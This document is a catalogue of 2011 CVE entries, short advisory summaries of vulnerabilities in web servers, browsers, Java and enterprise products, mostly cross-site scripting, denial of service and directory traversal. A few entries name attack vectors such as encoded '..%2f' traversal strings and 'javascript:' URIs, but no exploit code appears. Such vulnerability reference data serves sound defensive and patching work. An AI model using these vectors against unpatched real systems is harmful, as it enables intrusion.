[CVE-2011-1422] Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in EMC RSA Adaptive Authentication On-Premise (AAOP) 2.x, 5.7.x, and 6.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
[CVE-2011-1414] Cross-site scripting (XSS) vulnerability in the tibbr web server, as used in TIBCO tibbr 1.0.0 through 1.5.0 and tibbr Service 1.0.0 through 1.5.0, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1405] Cross-site scripting (XSS) vulnerability in Mahara before 1.3.6 allows remote authenticated users to inject arbitrary web script or HTML via vectors associated with HTML e-mail messages, related to artefact/comment/lib.php and interaction/forum/lib.php.
[CVE-2011-1396] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote attackers to inject arbitrary web script or HTML via the reportType parameter to an unspecified component.
[CVE-2011-1395] Cross-site scripting (XSS) vulnerability in imicon.jsp in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote attackers to inject arbitrary web script or HTML via the controlid parameter.
[CVE-2011-1378] IBM WebSphere MQ 6.0 on OpenVMS, when the default rights of the MQM group are established, does not properly verify User Authorization File (UAF) data, which allows local users to kill listener processes and the command server via a control command.
[CVE-2011-1377] The Web Services Security component in the Web Services Feature Pack before 6.1.0.41 for IBM WebSphere Application Server (WAS) 6.1 does not properly handle the enabling of WS-Security for a JAX-WS application, which has unspecified impact and attack vectors.
[CVE-2011-1376] iscdeploy in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.43, 7.0 before 7.0.0.21, and 8.0 before 8.0.0.2 on the IBM i platform sets weak permissions under systemapps/isclite.ear/ and bin/client_ffdc/, which allows local users to read or modify files via standard filesystem operations.
[CVE-2011-1371] Cross-site scripting (XSS) vulnerability in content/error.jsp in IBM WebSphere ILOG Rule Team Server 7.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors that trigger an Unknown Error document, a different vulnerability than CVE-2011-4171.
[CVE-2011-1368] The JavaServer Faces (JSF) application functionality in IBM WebSphere Application Server 8.x before 8.0.0.1 does not properly handle requests, which allows remote attackers to read unspecified files via unknown vectors.
[CVE-2011-1362] Cross-site scripting (XSS) vulnerability in the Installation Verification Test (IVT) application in the Install component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 and 7.0 before 7.0.0.19 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1308.
[CVE-2011-1360] Multiple cross-site scripting (XSS) vulnerabilities in IBM HTTP Server 2.0.47 and earlier, as used in WebSphere Application Server and other products, allow remote attackers to inject arbitrary web script or HTML via vectors involving unspecified documentation files in (1) manual/ibm/ and (2) htdocs/*/manual/ibm/.
[CVE-2011-1359] Directory traversal vulnerability in the administration console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41, 7.0 before 7.0.0.19, and 8.0 before 8.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2011-1357] Cross-site scripting (XSS) vulnerability in agentDetect.jsp in the web UI in IBM WebSphere Service Registry and Repository (WSRR) 6.3 before 6.3.0.5, 7.0 before 7.0.0.5, and 7.5 before 7.5.0.1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2011-1356] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.19 allows local users to obtain sensitive stack-trace information via a crafted Administration Console request.
[CVE-2011-1355] Open redirect vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.19 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the logoutExitPage parameter.
[CVE-2011-1344] Use-after-free vulnerability in WebKit, as used in Apple Safari before 5.0.5
[CVE-2011-1343] SQL injection vulnerability in the Web GUI in IBM Tivoli Netcool/OMNIbus before 7.3.0.4 allows remote attackers to execute arbitrary SQL commands via "dynamic SQL parameters."
[CVE-2011-1340] Cross-site scripting (XSS) vulnerability in skins/plone_templates/default_error_message.pt in Plone before 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the type_name parameter to Members/ipa/createObject.
[CVE-2011-1339] Cross-site scripting (XSS) vulnerability in Google Search Appliance before 5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1335] Cross-site scripting (XSS) vulnerability in Cybozu Office 6, 7, and 8 before 8.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "address book and user list functions."
[CVE-2011-1334] Cross-site scripting (XSS) vulnerability in Cybozu Office 6, Cybozu Garoon 2.0.0 through 2.1.3, Cybozu Dezie before 6.1, Cybozu MailWise before 3.1, and Cybozu Collaborex before 1.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "downloading graphic files from the mail system."
[CVE-2011-1333] Cross-site scripting (XSS) vulnerability in Cybozu Office 6 and Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via vectors related to "downloading graphic files from the bulletin board system."
[CVE-2011-1332] Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-6570.
[CVE-2011-1330] Cross-site scripting (XSS) vulnerability in WeblyGo 5.0 Pro/LE, 5.02 Pro/LE, 5.03 Pro/LE, 5.04 Pro/LE, and 5.10 Pro/LE allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1322] The SOAP with Attachments API for Java (SAAJ) implementation in the Web Services component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) via encrypted SOAP messages.
[CVE-2011-1321] The AuthCache purge implementation in the Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 does not purge a user from the PlatformCredential cache, which might allow remote authenticated users to gain privileges by leveraging a group membership specified in an old RACF Object (aka RACO).
[CVE-2011-1320] The Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15, when the Tivoli Integrated Portal / embedded WebSphere Application Server (TIP/eWAS) framework is used, does not properly delete AuthCache entries upon a logout, which might allow remote attackers to access the server by leveraging an unattended workstation.
[CVE-2011-1319] The Security component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15 allows remote authenticated users to cause a denial of service (memory consumption) by using a Lightweight Third-Party Authentication (LTPA) token for authentication.
[CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
[CVE-2011-1317] Memory leak in com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.37 and 7.x before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by sending many JSP requests that trigger large responses.
[CVE-2011-1316] The Session Initiation Protocol (SIP) Proxy in the HTTP Transport component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (worker thread exhaustion and UDP messaging outage) by sending many UDP messages.
[CVE-2011-1315] Memory leak in the messaging engine in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) via network connections associated with a NULL return value from a synchronous JMS receive call.
[CVE-2011-1314] The Service Integration Bus (SIB) messaging engine in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (daemon hang) by performing close operations via network connections to a queue manager.
[CVE-2011-1313] Double free vulnerability in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15 allows remote backend IIOP servers to cause a denial of service (S0C4 ABEND and storage corruption) by rejecting IIOP requests at opportunistic time instants, as demonstrated by requests associated with an ORB_Request::getACRWorkElementPtr function call.
[CVE-2011-1312] The Administrative Console component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.31 and 7.x before 7.0.0.15 does not prevent modifications of the primary admin id, which allows remote authenticated administrators to bypass intended access restrictions by mapping a (1) user or (2) group to an administrator role.
[CVE-2011-1311] The Security component in IBM WebSphere Application Server (WAS) before 7.0.0.15, when a J2EE 1.4 application is used, determines the security role mapping on the basis of the ibm-application-bnd.xml file instead of the intended ibm-application-bnd.xmi file, which might allow remote authenticated users to gain privileges in opportunistic circumstances by requesting a service.
[CVE-2011-1310] The Administrative Scripting Tools component in IBM WebSphere Application Server (WAS) 6.1.0.x before 6.1.0.35 and 7.x before 7.0.0.15, when tracing is enabled, places wsadmin command parameters into the (1) wsadmin.traceout and (2) trace.log files, which allows local users to obtain potentially sensitive information by reading these files.
[CVE-2011-1309] The Plug-in component in IBM WebSphere Application Server (WAS) before 7.0.0.15 does not properly handle trace requests, which has unspecified impact and attack vectors.
[CVE-2011-1308] Cross-site scripting (XSS) vulnerability in the Installation Verification Test (IVT) application in the Install component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1307] The installer in IBM WebSphere Application Server (WAS) before 7.0.0.15 uses 777 permissions for a temporary log directory, which allows local users to have unintended access to log files via standard filesystem operations, a different vulnerability than CVE-2009-1173.
[CVE-2011-1300] The Program::getActiveUniformMaxLength function in libGLESv2/Program.cpp in libGLESv2.dll in the WebGLES library in Almost Native Graphics Layer Engine (ANGLE), as used in Mozilla Firefox 4.x before 4.0.1 on Windows and in the GPU process in Google Chrome before 10.0.648.205 on Windows, allows remote attackers to execute arbitrary code via unspecified vectors, related to an "off-by-three" error.
[CVE-2011-1295] WebKit, as used in Google Chrome before 10.0.648.204 and Apple Safari before 5.0.6, does not properly handle node parentage, which allows remote attackers to cause a denial of service (DOM tree corruption), conduct cross-site scripting (XSS) attacks, or possibly have unspecified other impact via unknown vectors.
[CVE-2011-1290] Integer overflow in WebKit, as used on the Research In Motion (RIM) BlackBerry Torch 9800 with firmware 6.0.0.246, in Google Chrome before 10.0.648.133, and in Apple Safari before 5.0.5, allows remote attackers to execute arbitrary code via unknown vectors related to CSS "style handling," nodesets, and a length value, as demonstrated by Vincenzo Iozzo, Willem Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at CanSecWest 2011.
[CVE-2011-1288] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability."
[CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability."
[CVE-2011-1258] Microsoft Internet Explorer 6 through 8 does not properly restrict web script, which allows user-assisted remote attackers to obtain sensitive information from a different (1) domain or (2) zone via vectors involving a drag-and-drop operation, aka "Drag and Drop Information Disclosure Vulnerability."
[CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability."
[CVE-2011-1246] Microsoft Internet Explorer 8 does not properly handle content settings in HTTP responses, which allows remote web servers to obtain sensitive information from a different (1) domain or (2) zone via a crafted response, aka "MIME Sniffing Information Disclosure Vulnerability."
[CVE-2011-1245] Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Javascript Information Disclosure Vulnerability."
[CVE-2011-1244] Microsoft Internet Explorer 6, 7, and 8 does not enforce intended domain restrictions on content access, which allows remote attackers to obtain sensitive information or conduct clickjacking attacks via a crafted web site, aka "Frame Tag Information Disclosure Vulnerability."
[CVE-2011-1224] IBM WebSphere MQ 6.0 before 6.0.2.11 and 7.0 before 7.0.1.5 does not use the CRL Distribution Points (CDP) certificate extension, which might allow man-in-the-middle attackers to spoof an SSL partner via a revoked certificate for a (1) client, (2) queue manager, or (3) application.
[CVE-2011-1221] Cross-zone scripting vulnerability in the RealPlayer ActiveX control in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.0 through 2.1.5 allows remote attackers to inject arbitrary web script or HTML in the Local Zone via a local HTML document, a different vulnerability than CVE-2011-2947.
[CVE-2011-1209] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.17 uses a weak WS-Security XML encryption algorithm, which makes it easier for remote attackers to obtain plaintext data from a (1) JAX-RPC or (2) JAX-WS Web Services request via unspecified vectors related to a "decryption attack."
[CVE-2011-1201] The context implementation in WebKit, as used in Google Chrome before 10.0.648.127, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
[CVE-2011-1190] The Web Workers implementation in Google Chrome before 10.0.648.127 allows remote attackers to bypass the Same Origin Policy via unspecified vectors, related to an "error message leak."
[CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
[CVE-2011-1168] Cross-site scripting (XSS) vulnerability in the KHTMLPart::htmlError function in khtml/khtml_part.cpp in Konqueror in KDE SC 4.4.0 through 4.6.1 allows remote attackers to inject arbitrary web script or HTML via the URI in a URL corresponding to an unavailable web site.
[CVE-2011-1158] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) 5.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via an unexpected URI scheme, as demonstrated by a javascript: URI.
[CVE-2011-1157] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) 5.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via malformed XML comments.
[CVE-2011-1129] Cross-site scripting (XSS) vulnerability in the EditNews function in ManageNews.php in Simple Machines Forum (SMF) before 1.1.13, and 2.x before 2.0 RC5, might allow remote authenticated users to inject arbitrary web script or HTML via a save_items action.
[CVE-2011-1122] The WebGL implementation in Google Chrome before 9.0.597.107 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, aka Issue 71960.
[CVE-2011-1120] The WebGL implementation in Google Chrome before 9.0.597.107 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, aka Issue 71717.
[CVE-2011-1106] Cross-site scripting (XSS) vulnerability in stcenter.nsf in the server in IBM Lotus Sametime allows remote attackers to inject arbitrary web script or HTML via the authReasonCode parameter in an OpenDatabase action.
[CVE-2011-1105] Multiple cross-site scripting (XSS) vulnerabilities in Mutare EVM allow remote attackers to inject arbitrary web script or HTML via (1) a delivery address and possibly (2) a PIN.
[CVE-2011-1103] The WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to obtain sensitive information via a request to an invalid report, which reveals the installation path in an error message, as demonstrated with requests to (1) report/infection-table.html or (2) report/productsummary-table.html.
[CVE-2011-1102] Cross-site scripting (XSS) vulnerability in the WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1096] The W3C XML Encryption Standard, as used in the JBoss Web Services (JBossWS) component in JBoss Enterprise Portal Platform before 5.2.2 and other products, when using block ciphers in cipher-block chaining (CBC) mode, allows remote attackers to obtain plaintext data via a chosen-ciphertext attack on SOAP responses, aka "character encoding pattern attack."
[CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
[CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps.
[CVE-2011-1066] Cross-site scripting (XSS) vulnerability in the Messaging module 6.x-2.x before 6.x-2.4 and 6.x-4.x before 6.x-4.0-beta8 for Drupal allows remote attackers with administer messaging permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1065] Multiple stack-based buffer overflows in the PIPIWebPlayer ActiveX control (PIWebPlayer.ocx) in PIPI Player 2.8.0.0 allow remote attackers to execute arbitrary code via long arguments to the (1) PlayURL or (2) PlayURLWithLocalPlayer methods.
[CVE-2011-1063] Multiple cross-site scripting (XSS) vulnerabilities in Cherry-Design Photopad 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id or (2) data[title] parameters in an edit action to files.php, or (3) id parameter in a view action to gallery.php.
[CVE-2011-1062] Multiple cross-site scripting (XSS) vulnerabilities in include/html/header.php in TaskFreak! 0.6.4 allow remote attackers to inject arbitrary web script or HTML via the (1) sContext, (2) sort, (3) dir, and (4) show parameters in a save action to index.php.
[CVE-2011-1059] Use-after-free vulnerability in WebCore in WebKit before r77705, as used in Google Chrome before 11.0.672.2 and other products, allows user-assisted remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via vectors that entice a user to resubmit a form, related to improper handling of provisional items by the HistoryController component, aka rdar problem 8938557.
[CVE-2011-1058] Cross-site scripting (XSS) vulnerability in the reStructuredText (rst) parser in parser/text_rst.py in MoinMoin before 1.9.3, when docutils is installed or when "format rst" is set, allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in the refuri attribute. NOTE: some of these details are obtained from third party information.
[CVE-2011-1050] Unspecified vulnerability in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors related to "conversion of string encodings" and "inconsistencies in the handling of UTF8 sequences by the user interface."
[CVE-2011-1038] Multiple cross-site scripting (XSS) vulnerabilities in stconf.nsf in the server in IBM Lotus Sametime 8.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the messageString parameter in a WebMessage action or (2) the PATH_INFO.
[CVE-2011-1034] Cross-site scripting (XSS) vulnerability in the UI in IBM Rational Build Forge 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter to the fullcontrol program. NOTE: some of these details are obtained from third party information.
[CVE-2011-1032] IBM Lotus Connections 3.0, when IBM WebSphere Application Server 7.0.0.11 is used, does not properly restrict access to the internal login module, which has unspecified impact and attack vectors.
[CVE-2011-1030] Cross-site scripting (XSS) vulnerability in the Wikis component in IBM Lotus Connections 3.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "Confirm New Page scene."
[CVE-2011-1029] Cross-site scripting (XSS) vulnerability in IBM Rational Team Concert (RTC) 2.0.0.x allows remote authenticated users to inject arbitrary web script or HTML via the name of a shared report.
[CVE-2011-1007] Best Practical Solutions RT before 3.8.9 does not perform certain redirect actions upon a login, which allows physically proximate attackers to obtain credentials by resubmitting the login form via the back button of a web browser on an unattended workstation after an RT logout.
[CVE-2011-0962] Cross-site scripting (XSS) vulnerability in CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine in the Common Services Device Center in Cisco Unified Operations Manager (CUOM) before 8.6 allows remote attackers to inject arbitrary web script or HTML via the tag parameter, aka Bug ID CSCto12712.
[CVE-2011-0961] Cross-site scripting (XSS) vulnerability in cwhp/device.center.do in the Help servlet in Cisco CiscoWorks Common Services 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the device parameter, aka Bug ID CSCto12704.
[CVE-2011-0959] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.
[CVE-2011-0926] A certain ActiveX control in CSDWebInstaller.ocx in Cisco Secure Desktop (CSD) does not properly verify the signature of an unspecified downloaded program, which allows remote attackers to execute arbitrary code by spoofing the CSD installation process, a different vulnerability than CVE-2010-0589.
[CVE-2011-0925] The CSDWebInstallerCtrl ActiveX control in CSDWebInstaller.ocx in Cisco Secure Desktop (CSD) allows remote attackers to download an unintended Cisco program onto a client machine, and execute this program, by identifying a Cisco program with a Cisco digital signature and then renaming this program to inst.exe, a different vulnerability than CVE-2010-0589 and CVE-2011-0926.
[CVE-2011-0921] crs.exe in the Cell Manager Service in the client in HP Data Protector does not properly validate credentials associated with the hostname, domain, and username, which allows remote attackers to execute arbitrary code by sending unspecified data over TCP, related to the webreporting client, the applet domain, and the java username.
[CVE-2011-0911] Cross-site scripting (XSS) vulnerability in the Users module in Zikula before 1.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: it is possible that this overlaps CVE-2011-0535.
[CVE-2011-0909] Cross-site scripting (XSS) vulnerability in Vanilla Forums before 2.0.17.6 allows remote attackers to inject arbitrary web script or HTML via the p parameter to an unspecified component, a different vulnerability than CVE-2011-0526.
[CVE-2011-0908] Open redirect vulnerability in Vanilla Forums before 2.0.17.6 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the Target parameter to an unspecified component, a different vulnerability than CVE-2011-0526.
[CVE-2011-0903] Multiple directory traversal vulnerabilities in AR Web Content Manager (AWCM) 2.2 allow remote attackers to read arbitrary files and possibly have other unspecified impact via a .. (dot dot) in the (1) awcm_theme or (2) awcm_lang cookie to (a) index.php or (b) header.php.
[CVE-2011-0898] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.00 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0893] Cross-site scripting (XSS) vulnerability in HP Operations 9.10 on UNIX platforms allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0892] Cross-site scripting (XSS) vulnerability in HP Diagnostics 7.5x and 8.0x before 8.05.54.225 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2011-0887] The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie.
[CVE-2011-0871] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
[CVE-2011-0869] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 26 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to SAAJ.
[CVE-2011-0867] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
[CVE-2011-0866] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment.
[CVE-2011-0865] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Deserialization.
[CVE-2011-0864] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot.
[CVE-2011-0863] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2011-0846] Unspecified vulnerability in the Oracle Sun Java System Access Manager Policy Agent 2.2 allows remote attackers to affect availability via unknown vectors related to Web Proxy Agent.
[CVE-2011-0836] Unspecified vulnerability in Oracle JD Edwards EnterpriseOne Tools 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 allows remote authenticated users to affect integrity, related to Web Runtime SEC.
[CVE-2011-0817] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2011-0815] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to AWT.
[CVE-2011-0809] Unspecified vulnerability in the Web ADI component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
[CVE-2011-0788] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786.
[CVE-2011-0786] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788.
[CVE-2011-0773] Cross-site scripting (XSS) vulnerability in pivotx/modules/module_image.php in PivotX before 2.2.3 allows remote attackers to inject arbitrary web script or HTML via the image parameter.
[CVE-2011-0772] Multiple cross-site scripting (XSS) vulnerabilities in PivotX 2.2.0, and possibly other versions before 2.2.2, allow remote attackers to inject arbitrary web script or HTML via the (1) color parameter to includes/blogroll.php or (2) src parameter to includes/timwrapper.php.
[CVE-2011-0770] Cross-site scripting (XSS) vulnerability in Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 allows remote attackers to inject arbitrary web script or HTML via the Windows XP variable in a file.
[CVE-2011-0767] Cross-site scripting (XSS) vulnerability in the management GUI in the MX Management Server in Imperva SecureSphere Web Application Firewall 6.2, 7.x, and 8.x allows remote attackers to inject arbitrary web script or HTML via an HTTP request to a firewalled server, aka Bug ID 31759.
[CVE-2011-0756] The application server in Trustwave WebDefend Enterprise before 5.0 uses hardcoded console credentials, which makes it easier for remote attackers to read security-event data by using the remote console GUI to connect to the management port.
[CVE-2011-0751] Directory traversal vulnerability in nhttpd (aka Nostromo webserver) before 1.9.4 allows remote attackers to execute arbitrary programs or read arbitrary files via a ..%2f (encoded dot dot slash) in a URI.
[CVE-2011-0741] Multiple cross-site scripting (XSS) vulnerabilities in ModX Evolution before 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) installer or (2) image editor.
[CVE-2011-0740] Cross-site scripting (XSS) vulnerability in magpie/scripts/magpie_slashbox.php in RSS Feed Reader 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the rss_url parameter.
[CVE-2011-0736] ** DISPUTED ** Adobe ColdFusion 9.0.1 CHF1 and earlier, when a web application is configured to use a DBMS, allows remote attackers to obtain potentially sensitive information about the database structure via an id=- query to a .cfm file. NOTE: the vendor disputes the significance of this issue because the Site-wide Error Handler and Debug Output Settings sections of the ColdFusion Lockdown guide explain the requirement for settings that prevent this information disclosure.
[CVE-2011-0735] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via vectors involving a "tag script."
